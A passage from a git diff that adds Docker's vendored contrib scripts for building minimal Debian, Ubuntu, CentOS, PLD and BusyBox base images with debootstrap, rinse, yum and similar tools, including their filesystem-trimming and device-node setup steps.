+mknod -m 666 $DEV/ptmx c 5 2
+
+IMAGE_ID=$(tar --numeric-owner -C $ROOTFS -c . | docker import - crux:$VERSION)
+docker tag $IMAGE_ID crux:latest
+docker run -i -t crux echo Success.
+
+# Cleanup
+umount $CRUX
+rm -rf $ROOTFS
+rm -rf $CRUX
+rm -rf $TMP
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh
new file mode 100755
index 0000000000..412a5ce0a7
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh
@@ -0,0 +1,297 @@
+#!/usr/bin/env bash
+set -e
+
+echo >&2
+echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/debootstrap'
+echo >&2
+
+variant='minbase'
+include='iproute,iputils-ping'
+arch='amd64' # intentionally undocumented for now
+skipDetection=
+strictDebootstrap=
+justTar=
+
+usage() {
+	echo >&2
+
+	echo >&2 "usage: $0 [options] repo suite [mirror]"
+
+	echo >&2
+	echo >&2 'options: (not recommended)'
+	echo >&2 "  -p set an http_proxy for debootstrap"
+	echo >&2 "  -v $variant # change default debootstrap variant"
+	echo >&2 "  -i $include # change default package includes"
+	echo >&2 "  -d # strict debootstrap (do not apply any docker-specific tweaks)"
+	echo >&2 "  -s # skip version detection and tagging (ie, precise also tagged as 12.04)"
+	echo >&2 "     # note that this will also skip adding universe and/or security/updates to sources.list"
+	echo >&2 "  -t # just create a tarball, especially for dockerbrew (uses repo as tarball name)"
+
+	echo >&2
+	echo >&2 "   ie: $0 username/debian squeeze"
+	echo >&2 "       $0 username/debian squeeze http://ftp.uk.debian.org/debian/"
+
+	echo >&2
+	echo >&2 "   ie: $0 username/ubuntu precise"
+	echo >&2 "       $0 username/ubuntu precise http://mirrors.melbourne.co.uk/ubuntu/"
+
+	echo >&2
+	echo >&2 "   ie: $0 -t precise.tar.bz2 precise"
+	echo >&2 "       $0 -t wheezy.tgz wheezy"
+	echo >&2 "       $0 -t wheezy-uk.tar.xz wheezy http://ftp.uk.debian.org/debian/"
+
+	echo >&2
+}
+
+# these should match the names found at http://www.debian.org/releases/
+debianStable=wheezy
+debianUnstable=sid
+# this should match the name found at http://releases.ubuntu.com/
+ubuntuLatestLTS=trusty
+# this should match the name found at http://releases.tanglu.org/
+tangluLatest=aequorea
+
+while getopts v:i:a:p:dst name; do
+	case "$name" in
+		p)
+			http_proxy="$OPTARG"
+			;;
+		v)
+			variant="$OPTARG"
+			;;
+		i)
+			include="$OPTARG"
+			;;
+		a)
+			arch="$OPTARG"
+			;;
+		d)
+			strictDebootstrap=1
+			;;
+		s)
+			skipDetection=1
+			;;
+		t)
+			justTar=1
+			;;
+		?)
+			usage
+			exit 0
+			;;
+	esac
+done
+shift $(($OPTIND - 1))
+
+repo="$1"
+suite="$2"
+mirror="${3:-}" # stick to the default debootstrap mirror if one is not provided
+
+if [ ! "$repo" ] || [ ! "$suite" ]; then
+	usage
+	exit 1
+fi
+
+# some rudimentary detection for whether we need to "sudo" our docker calls
+docker=''
+if docker version > /dev/null 2>&1; then
+	docker='docker'
+elif sudo docker version > /dev/null 2>&1; then
+	docker='sudo docker'
+elif command -v docker > /dev/null 2>&1; then
+	docker='docker'
+else
+	echo >&2 "warning: either docker isn't installed, or your current user cannot run it;"
+	echo >&2 "         this script is not likely to work as expected"
+	sleep 3
+	docker='docker' # give us a command-not-found later
+fi
+
+# make sure we have an absolute path to our final tarball so we can still reference it properly after we change directory
+if [ "$justTar" ]; then
+	if [ ! -d "$(dirname "$repo")" ]; then
+		echo >&2 "error: $(dirname "$repo") does not exist"
+		exit 1
+	fi
+	repo="$(cd "$(dirname "$repo")" && pwd -P)/$(basename "$repo")"
+fi
+
+# will be filled in later, if [ -z "$skipDetection" ]
+lsbDist=''
+
+target="${TMPDIR:-/var/tmp}/docker-rootfs-debootstrap-$suite-$$-$RANDOM"
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+returnTo="$(pwd -P)"
+
+if [ "$suite" = 'lucid' ]; then
+	# lucid fails and doesn't include gpgv in minbase; "apt-get update" fails
+	include+=',gpgv'
+fi
+
+set -x
+
+# bootstrap
+mkdir -p "$target"
+sudo http_proxy=$http_proxy debootstrap --verbose --variant="$variant" --include="$include" --arch="$arch" "$suite" "$target" "$mirror"
+
+cd "$target"
+
+if [ -z "$strictDebootstrap" ]; then
+	# prevent init scripts from running during install/update
+	#  policy-rc.d (for most scripts)
+	echo $'#!/bin/sh\nexit 101' | sudo tee usr/sbin/policy-rc.d > /dev/null
+	sudo chmod +x usr/sbin/policy-rc.d
+	#  initctl (for some pesky upstart scripts)
+	sudo chroot . dpkg-divert --local --rename --add /sbin/initctl
+	sudo ln -sf /bin/true sbin/initctl
+	# see https://github.com/docker/docker/issues/446#issuecomment-16953173
+
+	# shrink the image, since apt makes us fat (wheezy: ~157.5MB vs ~120MB)
+	sudo chroot . apt-get clean
+
+	if strings usr/bin/dpkg | grep -q unsafe-io; then
+		# while we're at it, apt is unnecessarily slow inside containers
+		#  this forces dpkg not to call sync() after package extraction and speeds up install
+		#    the benefit is huge on spinning disks, and the penalty is nonexistent on SSD or decent server virtualization
+		echo 'force-unsafe-io' | sudo tee etc/dpkg/dpkg.cfg.d/02apt-speedup > /dev/null
+		# we have this wrapped up in an "if" because the "force-unsafe-io"
+		# option was added in dpkg 1.15.8.6
+		# (see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584254#82),
+		# and ubuntu lucid/10.04 only has 1.15.5.6
+	fi
+
+	# we want to effectively run "apt-get clean" after every install to keep images small (see output of "apt-get clean -s" for context)
+	{
+		aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";'
+		echo "DPkg::Post-Invoke { ${aptGetClean} };"
+		echo "APT::Update::Post-Invoke { ${aptGetClean} };"
+		echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";'
+	} | sudo tee etc/apt/apt.conf.d/no-cache > /dev/null
+
+	# and remove the translations, too
+	echo 'Acquire::Languages "none";' | sudo tee etc/apt/apt.conf.d/no-languages > /dev/null
+
+	# helpful undo lines for each the above tweaks (for lack of a better home to keep track of them):
+	#  rm /usr/sbin/policy-rc.d
+	#  rm /sbin/initctl; dpkg-divert --rename --remove /sbin/initctl
+	#  rm /etc/dpkg/dpkg.cfg.d/02apt-speedup
+	#  rm /etc/apt/apt.conf.d/no-cache
+	#  rm /etc/apt/apt.conf.d/no-languages
+
+	if [ -z "$skipDetection" ]; then
+		# see also rudimentary platform detection in hack/install.sh
+		lsbDist=''
+		if [ -r etc/lsb-release ]; then
+			lsbDist="$(. etc/lsb-release && echo "$DISTRIB_ID")"
+		fi
+		if [ -z "$lsbDist" ] && [ -r etc/debian_version ]; then
+			lsbDist='Debian'
+		fi
+
+		case "$lsbDist" in
+			Debian)
+				# add the updates and security repositories
+				if [ "$suite" != "$debianUnstable" -a "$suite" != 'unstable' ]; then
+					# ${suite}-updates only applies to non-unstable
+					sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list
+
+					# same for security updates
+					echo "deb http://security.debian.org/ $suite/updates main" | sudo tee -a etc/apt/sources.list > /dev/null
+				fi
+				;;
+			Ubuntu)
+				# add the universe, updates, and security repositories
+				sudo sed -i "
+					s/ $suite main$/ $suite main universe/; p;
+					s/ $suite main/ ${suite}-updates main/; p;
+					s/ $suite-updates main/ ${suite}-security main/
+				" etc/apt/sources.list
+				;;
+			Tanglu)
+				# add the updates repository
+				if [ "$suite" = "$tangluLatest" ]; then
+					# ${suite}-updates only applies to stable Tanglu versions
+					sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list
+				fi
+				;;
+			SteamOS)
+				# add contrib and non-free
+				sudo sed -i "s/ $suite main$/ $suite main contrib non-free/" etc/apt/sources.list
+				;;
+		esac
+	fi
+
+	# make sure our packages lists are as up to date as we can get them
+	sudo chroot . apt-get update
+	sudo chroot . apt-get dist-upgrade -y
+fi
+
+if [ "$justTar" ]; then
+	# create the tarball file so it has the right permissions (ie, not root)
+	touch "$repo"
+
+	# fill the tarball
+	sudo tar --numeric-owner -caf "$repo" .
+else
+	# create the image (and tag $repo:$suite)
+	sudo tar --numeric-owner -c . | $docker import - $repo:$suite
+
+	# test the image
+	$docker run -i -t $repo:$suite echo success
+
+	if [ -z "$skipDetection" ]; then
+		case "$lsbDist" in
+			Debian)
+				if [ "$suite" = "$debianStable" -o "$suite" = 'stable' ] && [ -r etc/debian_version ]; then
+					# tag latest
+					$docker tag $repo:$suite $repo:latest
+
+					if [ -r etc/debian_version ]; then
+						# tag the specific debian release version (which is only reasonable to tag on debian stable)
+						ver=$(cat etc/debian_version)
+						$docker tag $repo:$suite $repo:$ver
+					fi
+				fi
+				;;
+			Ubuntu)
+				if [ "$suite" = "$ubuntuLatestLTS" ]; then
+					# tag latest
+					$docker tag $repo:$suite $repo:latest
+				fi
+				if [ -r etc/lsb-release ]; then
+					lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")"
+					if [ "$lsbRelease" ]; then
+						# tag specific Ubuntu version number, if available (12.04, etc.)
+						$docker tag $repo:$suite $repo:$lsbRelease
+					fi
+				fi
+				;;
+			Tanglu)
+				if [ "$suite" = "$tangluLatest" ]; then
+					# tag latest
+					$docker tag $repo:$suite $repo:latest
+				fi
+				if [ -r etc/lsb-release ]; then
+					lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")"
+					if [ "$lsbRelease" ]; then
+						# tag specific Tanglu version number, if available (1.0, 2.0, etc.)
+						$docker tag $repo:$suite $repo:$lsbRelease
+					fi
+				fi
+				;;
+			SteamOS)
+				if [ -r etc/lsb-release ]; then
+					lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")"
+					if [ "$lsbRelease" ]; then
+						# tag specific SteamOS version number, if available (1.0, 2.0, etc.)
+						$docker tag $repo:$suite $repo:$lsbRelease
+					fi
+				fi
+				;;
+		esac
+	fi
+fi
+
+# cleanup
+cd "$returnTo"
+sudo rm -rf "$target"
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-pld.sh b/vendor/github.com/docker/docker/contrib/mkimage-pld.sh
new file mode 100755
index 0000000000..615c2030a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-pld.sh
@@ -0,0 +1,73 @@
+#!/bin/sh
+#
+# Generate a minimal filesystem for PLD Linux and load it into the local docker as "pld".
+# https://www.pld-linux.org/packages/docker
+#
+set -e
+
+if [ "$(id -u)" != "0" ]; then
+	echo >&2 "$0: requires root"
+	exit 1
+fi
+
+image_name=pld
+
+tmpdir=$(mktemp -d ${TMPDIR:-/var/tmp}/pld-docker-XXXXXX)
+root=$tmpdir/rootfs
+install -d -m 755 $root
+
+# to clean up:
+docker rmi $image_name || :
+
+# build
+rpm -r $root --initdb
+
+set +e
+install -d $root/dev/pts
+mknod $root/dev/random c 1 8 -m 644
+mknod $root/dev/urandom c 1 9 -m 644
+mknod $root/dev/full c 1 7 -m 666
+mknod $root/dev/null c 1 3 -m 666
+mknod $root/dev/zero c 1 5 -m 666
+mknod $root/dev/console c 5 1 -m 660
+set -e
+
+poldek -r $root --up --noask -u \
+	--noignore \
+	-O 'rpmdef=_install_langs C' \
+	-O 'rpmdef=_excludedocs 1' \
+	vserver-packages \
+	bash iproute2 coreutils grep poldek
+
+# fix netsharedpath, so containers would be able to install when some paths are mounted
+sed -i -e 's;^#%_netsharedpath.*;%_netsharedpath /dev/shm:/sys:/proc:/dev:/etc/hostname;' $root/etc/rpm/macros
+
+# no need for alternatives
+poldek-config -c $root/etc/poldek/poldek.conf ignore systemd-init
+
+# this makes initscripts to believe network is up
+touch $root/var/lock/subsys/network
+
+# cleanup large optional packages
+remove_packages="ca-certificates"
+for pkg in $remove_packages; do
+	rpm -r $root -q $pkg && rpm -r $root -e $pkg --nodeps
+done
+
+# cleanup more
+rm -v $root/etc/ld.so.cache
+rm -rfv $root/var/cache/hrmib/*
+rm -rfv $root/usr/share/man/man?/*
+rm -rfv $root/usr/share/locale/*/
+rm -rfv $root/usr/share/help/*/
+rm -rfv $root/usr/share/doc/*
+rm -rfv $root/usr/src/examples/*
+rm -rfv $root/usr/share/pixmaps/*
+
+# and import
+tar --numeric-owner --xattrs --acls -C $root -c . | docker import - $image_name
+
+# and test
+docker run -i -u root $image_name /bin/echo Success.
+
+rm -r $tmpdir
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh
new file mode 100755
index 0000000000..7e0935062f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh
@@ -0,0 +1,123 @@
+#!/usr/bin/env bash
+#
+# Create a base CentOS Docker image.
+
+# This script is useful on systems with rinse available (e.g.,
+# building a CentOS image on Debian).  See contrib/mkimage-yum.sh for
+# a way to build CentOS images on systems with yum installed.
+
+set -e
+
+echo >&2
+echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/rinse'
+echo >&2
+
+repo="$1"
+distro="$2"
+mirror="$3"
+
+if [ ! "$repo" ] || [ ! "$distro" ]; then
+	self="$(basename $0)"
+	echo >&2 "usage: $self repo distro [mirror]"
+	echo >&2
+	echo >&2 "   ie: $self username/centos centos-5"
+	echo >&2 "       $self username/centos centos-6"
+	echo >&2
+	echo >&2 "   ie: $self username/slc slc-5"
+	echo >&2 "       $self username/slc slc-6"
+	echo >&2
+	echo >&2 "   ie: $self username/centos centos-5 http://vault.centos.org/5.8/os/x86_64/CentOS/"
+	echo >&2 "       $self username/centos centos-6 http://vault.centos.org/6.3/os/x86_64/Packages/"
+	echo >&2
+	echo >&2 'See /etc/rinse for supported values of "distro" and for examples of'
+	echo >&2 '  expected values of "mirror".'
+	echo >&2
+	echo >&2 'This script is tested to work with the original upstream version of rinse,'
+	echo >&2 '  found at http://www.steve.org.uk/Software/rinse/ and also in Debian at'
+	echo >&2 '  http://packages.debian.org/wheezy/rinse -- as always, YMMV.'
+	echo >&2
+	exit 1
+fi
+
+target="${TMPDIR:-/var/tmp}/docker-rootfs-rinse-$distro-$$-$RANDOM"
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+returnTo="$(pwd -P)"
+
+rinseArgs=( --arch amd64 --distribution "$distro" --directory "$target" )
+if [ "$mirror" ]; then
+	rinseArgs+=( --mirror "$mirror" )
+fi
+
+set -x
+
+mkdir -p "$target"
+
+sudo rinse "${rinseArgs[@]}"
+
+cd "$target"
+
+# rinse fails a little at setting up /dev, so we'll just wipe it out and create our own
+sudo rm -rf dev
+sudo mkdir -m 755 dev
+(
+	cd dev
+	sudo ln -sf /proc/self/fd ./
+	sudo mkdir -m 755 pts
+	sudo mkdir -m 1777 shm
+	sudo mknod -m 600 console c 5 1
+	sudo mknod -m 600 initctl p
+	sudo mknod -m 666 full c 1 7
+	sudo mknod -m 666 null c 1 3
+	sudo mknod -m 666 ptmx c 5 2
+	sudo mknod -m 666 random c 1 8
+	sudo mknod -m 666 tty c 5 0
+	sudo mknod -m 666 tty0 c 4 0
+	sudo mknod -m 666 urandom c 1 9
+	sudo mknod -m 666 zero c 1 5
+)
+
+# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target"
+#  locales
+sudo rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive}
+#  docs and man pages
+sudo rm -rf usr/share/{man,doc,info,gnome/help}
+#  cracklib
+sudo rm -rf usr/share/cracklib
+#  i18n
+sudo rm -rf usr/share/i18n
+#  yum cache
+sudo rm -rf var/cache/yum
+sudo mkdir -p --mode=0755 var/cache/yum
+#  sln
+sudo rm -rf sbin/sln
+#  ldconfig
+#sudo rm -rf sbin/ldconfig
+sudo rm -rf etc/ld.so.cache var/cache/ldconfig
+sudo mkdir -p --mode=0755 var/cache/ldconfig
+
+# allow networking init scripts inside the container to work without extra steps
+echo 'NETWORKING=yes' | sudo tee etc/sysconfig/network > /dev/null
+
+# to restore locales later:
+#  yum reinstall glibc-common
+
+version=
+if [ -r etc/redhat-release ]; then
+	version="$(sed -E 's/^[^0-9.]*([0-9.]+).*$/\1/' etc/redhat-release)"
+elif [ -r etc/SuSE-release ]; then
+	version="$(awk '/^VERSION/ { print $3 }' etc/SuSE-release)"
+fi
+
+if [ -z "$version" ]; then
+	echo >&2 "warning: cannot autodetect OS version, using $distro as tag"
+	sleep 20
+	version="$distro"
+fi
+
+sudo tar --numeric-owner -c . | docker import - $repo:$version
+
+docker run -i -t $repo:$version echo success
+
+cd "$returnTo"
+sudo rm -rf "$target"
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh
new file mode 100755
index 0000000000..29da170480
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh
@@ -0,0 +1,136 @@
+#!/usr/bin/env bash
+#
+# Create a base CentOS Docker image.
+#
+# This script is useful on systems with yum installed (e.g., building
+# a CentOS image on CentOS).  See contrib/mkimage-rinse.sh for a way
+# to build CentOS images on other systems.
+
+set -e
+
+usage() {
+    cat <<EOOPTS
+$(basename $0) [OPTIONS] <name>
+OPTIONS:
+  -p "<packages>"  The list of packages to install in the container.
+                   The default is blank.
+  -g "<groups>"    The groups of packages to install in the container.
+                   The default is "Core".
+  -y <yumconf>     The path to the yum config to install packages from. The
+                   default is /etc/yum.conf for Centos/RHEL and /etc/dnf/dnf.conf for Fedora
+EOOPTS
+    exit 1
+}
+
+# option defaults
+yum_config=/etc/yum.conf
+if [ -f /etc/dnf/dnf.conf ] && command -v dnf &> /dev/null; then
+	yum_config=/etc/dnf/dnf.conf
+	alias yum=dnf
+fi
+install_groups="Core"
+while getopts ":y:p:g:h" opt; do
+    case $opt in
+        y)
+            yum_config=$OPTARG
+            ;;
+        h)
+            usage
+            ;;
+        p)
+            install_packages="$OPTARG"
+            ;;
+        g)
+            install_groups="$OPTARG"
+            ;;
+        \?)
+            echo "Invalid option: -$OPTARG"
+            usage
+            ;;
+    esac
+done
+shift $((OPTIND - 1))
+name=$1
+
+if [[ -z $name ]]; then
+    usage
+fi
+
+target=$(mktemp -d --tmpdir $(basename $0).XXXXXX)
+
+set -x
+
+mkdir -m 755 "$target"/dev
+mknod -m 600 "$target"/dev/console c 5 1
+mknod -m 600 "$target"/dev/initctl p
+mknod -m 666 "$target"/dev/full c 1 7
+mknod -m 666 "$target"/dev/null c 1 3
+mknod -m 666 "$target"/dev/ptmx c 5 2
+mknod -m 666 "$target"/dev/random c 1 8
+mknod -m 666 "$target"/dev/tty c 5 0
+mknod -m 666 "$target"/dev/tty0 c 4 0
+mknod -m 666 "$target"/dev/urandom c 1 9
+mknod -m 666 "$target"/dev/zero c 1 5
+
+# amazon linux yum will fail without vars set
+if [ -d /etc/yum/vars ]; then
+	mkdir -p -m 755 "$target"/etc/yum
+	cp -a /etc/yum/vars "$target"/etc/yum/
+fi
+
+if [[ -n "$install_groups" ]];
+then
+    yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \
+        --setopt=group_package_types=mandatory -y groupinstall $install_groups
+fi
+
+if [[ -n "$install_packages" ]];
+then
+    yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \
+        --setopt=group_package_types=mandatory -y install $install_packages
+fi
+
+yum -c "$yum_config" --installroot="$target" -y clean all
+
+cat > "$target"/etc/sysconfig/network <<EOF
+NETWORKING=yes
+HOSTNAME=localhost.localdomain
+EOF
+
+# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target".
+#  locales
+rm -rf "$target"/usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive}
+#  docs and man pages
+rm -rf "$target"/usr/share/{man,doc,info,gnome/help}
+#  cracklib
+rm -rf "$target"/usr/share/cracklib
+#  i18n
+rm -rf "$target"/usr/share/i18n
+#  yum cache
+rm -rf "$target"/var/cache/yum
+mkdir -p --mode=0755 "$target"/var/cache/yum
+#  sln
+rm -rf "$target"/sbin/sln
+#  ldconfig
+rm -rf "$target"/etc/ld.so.cache "$target"/var/cache/ldconfig
+mkdir -p --mode=0755 "$target"/var/cache/ldconfig
+
+version=
+for file in "$target"/etc/{redhat,system}-release
+do
+    if [ -r "$file" ]; then
+        version="$(sed 's/^[^0-9\]*\([0-9.]\+\).*$/\1/' "$file")"
+        break
+    fi
+done
+
+if [ -z "$version" ]; then
+    echo >&2 "warning: cannot autodetect OS version, using '$name' as tag"
+    version=$name
+fi
+
+tar --numeric-owner -c -C "$target" . | docker import - $name:$version
+
+docker run -i -t --rm $name:$version /bin/bash -c 'echo success'
+
+rm -rf "$target"
diff --git a/vendor/github.com/docker/docker/contrib/mkimage.sh b/vendor/github.com/docker/docker/contrib/mkimage.sh
new file mode 100755
index 0000000000..13298c8036
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage.sh
@@ -0,0 +1,128 @@
+#!/usr/bin/env bash
+set -e
+
+mkimg="$(basename "$0")"
+
+usage() {
+	echo >&2 "usage: $mkimg [-d dir] [-t tag] [--compression algo| --no-compression] script [script-args]"
+	echo >&2 "   ie: $mkimg -t someuser/debian debootstrap --variant=minbase jessie"
+	echo >&2 "       $mkimg -t someuser/ubuntu debootstrap --include=ubuntu-minimal --components=main,universe trusty"
+	echo >&2 "       $mkimg -t someuser/busybox busybox-static"
+	echo >&2 "       $mkimg -t someuser/centos:5 rinse --distribution centos-5"
+	echo >&2 "       $mkimg -t someuser/mageia:4 mageia-urpmi --version=4"
+	echo >&2 "       $mkimg -t someuser/mageia:4 mageia-urpmi --version=4 --mirror=http://somemirror/"
+	echo >&2 "       $mkimg -t someuser/solaris solaris" 
+	exit 1
+}
+
+scriptDir="$(dirname "$(readlink -f "$BASH_SOURCE")")/mkimage"
+
+os=
+os=$(uname -o)
+
+# set up path to gnu tools if solaris
+[[ $os == "Solaris" ]] && export PATH=/usr/gnu/bin:$PATH 
+# TODO check for gnu-tar, gnu-getopt
+
+# TODO requires root/sudo due to some pkg operations. sigh.
+[[ $os == "Solaris" && $EUID != "0" ]] && echo >&2 "image create on Solaris requires superuser privilege"
+
+optTemp=$(getopt --options '+d:t:c:hC' --longoptions 'dir:,tag:,compression:,no-compression,help' --name "$mkimg" -- "$@")
+eval set -- "$optTemp"
+unset optTemp
+
+dir=
+tag=
+compression="auto"
+while true; do
+	case "$1" in
+		-d|--dir) dir="$2" ; shift 2 ;;
+		-t|--tag) tag="$2" ; shift 2 ;;
+		--compression)    compression="$2"   ; shift 2 ;;
+		--no-compression) compression="none" ; shift 1 ;;
+		-h|--help) usage ;;
+		--) shift ; break ;;
+	esac
+done
+
+script="$1"
+[ "$script" ] || usage
+shift
+
+if [ "$compression" == 'auto' ] || [ -z "$compression" ]
+then
+    compression='xz'
+fi
+
+[ "$compression" == 'none' ] && compression=''
+
+if [ ! -x "$scriptDir/$script" ]; then
+	echo >&2 "error: $script does not exist or is not executable"
+	echo >&2 "  see $scriptDir for possible scripts"
+	exit 1
+fi
+
+# don't mistake common scripts like .febootstrap-minimize as image-creators
+if [[ "$script" == .* ]]; then
+	echo >&2 "error: $script is a script helper, not a script"
+	echo >&2 "  see $scriptDir for possible scripts"
+	exit 1
+fi
+
+delDir=
+if [ -z "$dir" ]; then
+	dir="$(mktemp -d ${TMPDIR:-/var/tmp}/docker-mkimage.XXXXXXXXXX)"
+	delDir=1
+fi
+
+rootfsDir="$dir/rootfs"
+( set -x; mkdir -p "$rootfsDir" )
+
+# pass all remaining arguments to $script
+"$scriptDir/$script" "$rootfsDir" "$@"
+
+# Docker mounts tmpfs at /dev and procfs at /proc so we can remove them
+rm -rf "$rootfsDir/dev" "$rootfsDir/proc"
+mkdir -p "$rootfsDir/dev" "$rootfsDir/proc"
+
+# make sure /etc/resolv.conf has something useful in it
+mkdir -p "$rootfsDir/etc"
+cat > "$rootfsDir/etc/resolv.conf" <<'EOF'
+nameserver 8.8.8.8
+nameserver 8.8.4.4
+EOF
+
+tarFile="$dir/rootfs.tar${compression:+.$compression}"
+touch "$tarFile"
+
+(
+	set -x
+	tar --numeric-owner --create --auto-compress --file "$tarFile" --directory "$rootfsDir" --transform='s,^./,,' .
+)
+
+echo >&2 "+ cat > '$dir/Dockerfile'"
+cat > "$dir/Dockerfile" <<EOF
+FROM scratch
+ADD $(basename "$tarFile") /
+EOF
+
+# if our generated image has a decent shell, let's set a default command
+for shell in /bin/bash /usr/bin/fish /usr/bin/zsh /bin/sh; do
+	if [ -x "$rootfsDir/$shell" ]; then
+		( set -x; echo 'CMD ["'"$shell"'"]' >> "$dir/Dockerfile" )
+		break
+	fi
+done
+
+( set -x; rm -rf "$rootfsDir" )
+
+if [ "$tag" ]; then
+	( set -x; docker build -t "$tag" "$dir" )
+elif [ "$delDir" ]; then
+	# if we didn't specify a tag and we're going to delete our dir, let's just build an untagged image so that we did _something_
+	( set -x; docker build "$dir" )
+fi
+
+if [ "$delDir" ]; then
+	( set -x; rm -rf "$dir" )
+fi
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize b/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize
new file mode 100755
index 0000000000..7749e63fb0
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+set -e
+
+rootfsDir="$1"
+shift
+
+(
+	cd "$rootfsDir"
+
+	# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target"
+	#  locales
+	rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive}
+	#  docs and man pages
+	rm -rf usr/share/{man,doc,info,gnome/help}
+	#  cracklib
+	rm -rf usr/share/cracklib
+	#  i18n
+	rm -rf usr/share/i18n
+	#  yum cache
+	rm -rf var/cache/yum
+	mkdir -p --mode=0755 var/cache/yum
+	#  sln
+	rm -rf sbin/sln
+	#  ldconfig
+	#rm -rf sbin/ldconfig
+	rm -rf etc/ld.so.cache var/cache/ldconfig
+	mkdir -p --mode=0755 var/cache/ldconfig
+)
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/busybox-static b/vendor/github.com/docker/docker/contrib/mkimage/busybox-static
new file mode 100755
index 0000000000..e15322b49d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage/busybox-static
@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+set -e
+
+rootfsDir="$1"
+shift
+
+busybox="$(which busybox 2>/dev/null || true)"
+if [ -z "$busybox" ]; then
+	echo >&2 'error: busybox: not found'
+	echo >&2 '  install it with your distribution "busybox-static" package'
+	exit 1
+fi
+if ! ldd "$busybox" 2>&1 | grep -q 'not a dynamic executable'; then
+	echo >&2 "error: '$busybox' appears to be a dynamic executable"
+	echo >&2 '  you should install your distribution "busybox-static" package instead'
+	exit 1
+fi
+
+mkdir -p "$rootfsDir/bin"
+rm -f "$rootfsDir/bin/busybox" # just in case
+cp "$busybox" "$rootfsDir/bin/busybox"
+
+(
+	cd "$rootfsDir"
+
+	IFS=$'\n'
+	modules=( $(bin/busybox --list-modules) )
+	unset IFS
+
+	for module in "${modules[@]}"; do
+		mkdir -p "$(dirname "$module")"
+		ln -sf /bin/busybox "$module"
+	done
+)
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap
new file mode 100755
index 0000000000..7d56d8ea9f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap
@@ -0,0 +1,226 @@
+#!/usr/bin/env bash
+set -e
+
+rootfsDir="$1"
+shift
+
+# we have to do a little fancy footwork to make sure "rootfsDir" becomes the second non-option argument to debootstrap
+
+before=()
+while [ $# -gt 0 ] && [[ "$1" == -* ]]; do
+	before+=( "$1" )
+	shift
+done
+
+suite="$1"
+shift
+
+# get path to "chroot" in our current PATH
+chrootPath="$(type -P chroot)"
+rootfs_chroot() {
+	# "chroot" doesn't set PATH, so we need to set it explicitly to something our new debootstrap chroot can use appropriately!
+
+	# set PATH and chroot away!
+	PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' \
+		"$chrootPath" "$rootfsDir" "$@"
+}
+
+# allow for DEBOOTSTRAP=qemu-debootstrap ./mkimage.sh ...
+: ${DEBOOTSTRAP:=debootstrap}
+
+(
+	set -x
+	$DEBOOTSTRAP "${before[@]}" "$suite" "$rootfsDir" "$@"
+)
+
+# now for some Docker-specific tweaks
+
+# prevent init scripts from running during install/update
+echo >&2 "+ echo exit 101 > '$rootfsDir/usr/sbin/policy-rc.d'"
+cat > "$rootfsDir/usr/sbin/policy-rc.d" <<-'EOF'
+	#!/bin/sh
+
+	# For most Docker users, "apt-get install" only happens during "docker build",
+	# where starting services doesn't work and often fails in humorous ways. This
+	# prevents those failures by stopping the services from attempting to start.
+
+	exit 101
+EOF
+chmod +x "$rootfsDir/usr/sbin/policy-rc.d"
+
+# prevent upstart scripts from running during install/update
+(
+	set -x
+	rootfs_chroot dpkg-divert --local --rename --add /sbin/initctl
+	cp -a "$rootfsDir/usr/sbin/policy-rc.d" "$rootfsDir/sbin/initctl"
+	sed -i 's/^exit.*/exit 0/' "$rootfsDir/sbin/initctl"
+)
+
+# shrink a little, since apt makes us cache-fat (wheezy: ~157.5MB vs ~120MB)
+( set -x; rootfs_chroot apt-get clean )
+
+# this file is one APT creates to make sure we don't "autoremove" our currently
